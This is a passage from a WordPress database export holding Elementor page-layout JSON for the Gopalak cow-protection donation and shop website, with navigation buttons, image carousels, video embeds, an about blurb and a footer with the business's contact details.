Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11867,1968,'_elementor_page_assets','a:0:{}'),(11869,1969,'_elementor_edit_mode','builder'),(11870,1969,'_elementor_template_type','wp-page'),(11871,1969,'_elementor_version','3.7.8'),(11872,1969,'_wp_page_template','elementor_canvas'),(11873,1969,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: 